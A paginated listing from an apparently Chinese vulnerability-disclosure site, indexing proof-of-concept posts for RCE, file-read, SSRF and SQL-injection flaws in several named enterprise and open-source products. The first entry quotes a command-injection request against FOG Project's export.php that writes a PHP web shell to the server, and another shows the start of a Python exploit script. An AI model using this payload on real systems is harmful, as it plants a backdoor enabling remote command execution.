专题 2024你懂的_秃兔安全

fogproject系统接口export.php存在远程命令执行漏洞

POST /fog/management/export.php?filename=$(echo+'<?php+echo+shell_exec($_GET[‘”‘cmd'”‘]);+?>’+>+lol.php)&type=pdf HTTP/1.1Host: 192.168.15.5Content-Length: 21Use...

POC

秃兔11个月前

0875

同享TXEHR V15人力管理管理平台DownloadFile存在任意文件下载漏洞

POC

秃兔11个月前

08810

金和OAC6-FileDownLoad.aspx任意文件读取漏洞

POC

秃兔11个月前

04914

汇智ERP-filehandle.aspx存在任意文件读取漏洞

POC

秃兔11个月前

0727

山石网科云鉴存在前台任意命令执行漏洞

import requests”’HSVD-2023-0008”’def setSystemTimeAction(newcsrf,headers): 登录可见余下内容

POC

秃兔11个月前

08815

超级猫签名APP分发平台前台远程文件写入漏洞

POC

秃兔11个月前

0845

泛微ecology系统setup接口存在信息泄露漏洞

POC

秃兔11个月前

0926

福建科立讯通信指挥调度管理平台存在远程命令执行漏洞

POC

秃兔11个月前

011915

泛微e-cology9 存在SSRF漏洞

POC

秃兔11个月前

06611

AEGON-LIFEv1.0存在SQL注入漏洞(CVE-2024-36597)

POC

秃兔11个月前

01068

上一页 1…7 8910 11…22 下一页跳转